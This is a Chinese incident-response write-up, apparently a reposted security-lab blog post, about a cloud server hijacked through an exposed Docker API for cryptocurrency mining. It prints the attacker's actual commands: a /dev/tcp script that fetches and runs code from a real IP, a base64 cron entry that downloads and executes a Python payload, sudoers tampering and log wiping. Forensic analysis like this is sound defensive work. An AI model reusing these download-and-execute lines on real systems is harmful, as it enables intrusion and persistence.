出品|MS08067實驗室(www.ms08067.com)
本文作者:500(Ms08067實驗室成員)
一、事件起因
??上周想著部署一個分布式檔案系統,我就在阿里云上申請了一臺機器,部署了docker并安裝Simpledfs,可不想剛云主機剛配置沒兩天,就發現機器的cpu使用率飆升,控制臺各種告警,登錄上去先看top一下看看系統的狀況,發現這個bash腳本幾乎占用了全部cup,估計是被黑了,
??我趕緊去查看機器歷史操作,通過history命令查看歷史操作,發現內容已經被清空,日志檔案也全部被清空,并且docker服務也被關閉了,
??經過排查發現,這臺機器開放了ssh服務22埠、本地smtp25埠、sshd守護行程222埠,以及docker服務的埠,對外暴露了ssh,第一個想到的就是先查看一下ssh的版本,
??查看該版本中有哪些漏洞可能被攻擊者利用,排查了可能被利用的OpenSSH 安全認證繞過漏洞(CVE-2016-10012)、SSH登陸驗證繞過漏洞(cve-2018-10933)等漏洞的利用方法,但并沒有發現可直接利用并獲取到root權限的方法,
??那么攻擊者有沒有可能利用docker的漏洞,然后從容器中逃逸出來呢?這時我想到了docker remote API未授權訪問漏洞,攻擊者可以利用docker API 2375埠,通過介面執行容器命令,然后將/root/.ssh目錄掛載到容器內,進而把ssh公鑰寫入進去,修改權限為600,然后就可以以root用戶登錄了,
參考:http://blog.nsfocus.net/docker-remote-api-unauthorized-access-vulnerability/
二、我們來看看攻擊者做了哪些操作
??1、攻擊者創建了一個新的賬號,查看/etc/passwd檔案,發現新增了一個用戶tech,創建的時間是22:12
tech:x:1000:1000::/home/tech:/bin/bash
??2、攻擊者將tech用戶加入到wheel組,并且修改了/etc/sudoers檔案,(這個檔案的權限被篡改過,應該是先加上了寫權限,篡改完成后又改回了440權限,并配置了wheel組用戶使用sudo到root時不需要輸入密碼,)
??3、隨后攻擊者下載了工具集busybox,被阿里云偵測到,
??4、攻擊者將根目錄換成指定的目錄,
chroot /mnt /bin/sh -c cd /opt/
???并寫入z.sh,
echo '#!/bin/bash' > z.sh
echo 'read proto server path<<<$(echo ${1//// })' >> z.sh
echo 'exec3<>/dev/tcp/42.51.64.146/443' >> z.sh
echo 'echo -en "GET /web2/$1HTTP/1.0\r\nHost: 42.51.64.146:443\r\n\r\n" >&3' >> z.sh
echo '(while read line; do' >> z.sh
echo '[[ "$line" ==$'\''\r'"'"' ]] && break' >> z.sh
echo 'done && cat) <&3'>> z.sh
echo 'exec 3>&-' >> z.sh
bash z.sh zz.sh > zz.sh ; bash zz.sh
rm -rf zz.sh
???其中里面包含了一個ip地址,威脅情報資訊如下:
???在系統的opt目錄下,果然存在z.sh
#!/bin/bash
read proto server path <<<$(echo${1//// })
exec 3<>/dev/tcp/42.51.64.146/443
echo -en "GET /web2/$1HTTP/1.0\r\nHost: 42.51.64.146:443\r\n\r\n" >&3
(while read line; do
[[ "$line" == $'\r' ]] &&break
done && cat) <&3
exec 3>&-
??5、攻擊者嘗試寫入后門程式,進行權限維持/usr/sbin/stable 但阿里云盾攔截了該后門程式,
??6、22點14分至22點47分這段時間,攻擊者kill掉了阿里云盾的防護,并下載挖礦程式,這個程序由于阿里云盾下線,日志被清理,未獲取到更多資訊,
??7、隨后,攻擊者下載了挖礦程式并進行了安裝,在/root/.ssh中出現了xmrig和config.json檔案,時間是22:49
???Xmirg是一款位元幣挖礦軟體,可以通過匹配到的礦池內容修改相應的config.json檔案,
???參考:https://www.dxpool.com/help/zh/kva-mining-tutorial
??8、在usr/bin中發現了運行著的bash腳本,應該是運行全套挖礦程式的腳步程式,
???查看下Bash腳本的運行狀態以及網路連接情況
??9、至此攻擊者還不滿足,他還替換了計劃任務檔案,設定挖礦的計劃任務,
???修改了/etc/ssh/sshd_config、/etc/cron.d、/etc/cron.hourly等計劃任務檔案,
???/var/spool/cron/root中的內容如下:
*/2 * * * * pkill tail >/dev/null2>&1
*/2 * * * * pkill masscan >/dev/null2>&1
# https://anonpasta.rocks/raw/atucewakep
# 205.185.113.151\|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExMy4xNTEvZC5weSIpLnJlYWQoKSkn(位元幣錢包地址)
??10、最后,攻擊者將系統的日志檔案全部洗掉,包括
???/var/log/cron、/var/log/secure、/var/log/messages、/var/log/maillog、/var/log/spooler等,
三、總結
??隨著數字貨幣價格的上漲,越來越多的攻擊者開始利用系統漏洞進行挖礦,攻擊者操作老練,思路清晰,一看就是做過多年的老手了,
??大家要加強安全意識,不要將危險埠暴露在公網,及時更新系統組件,并升級安全補丁,
轉載請聯系作者并注明出處!
Ms08067安全實驗室專注于網路安全知識的普及和培訓,團隊已出版《Web安全攻防:滲透測驗實戰指南》,《內網安全攻防:滲透測驗實戰指南》,《Python安全攻防:滲透測驗實戰指南》,《Java代碼安全審計(入門篇)》等書籍,
團隊公眾號定期分享關于CTF靶場、內網滲透、APT方面技術干貨,從零開始、以實戰落地為主,致力于做一個實用的干貨分享型公眾號,
官方網站:https://www.ms08067.com/
掃描下方二維碼加入實驗室VIP社區
加入后邀請加入內部VIP群,內部微信群永久有效!
?
?
?
?
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/261276.html
標籤:其他
上一篇:Z_hongli的留言板
下一篇:虛電路網路和資料報網路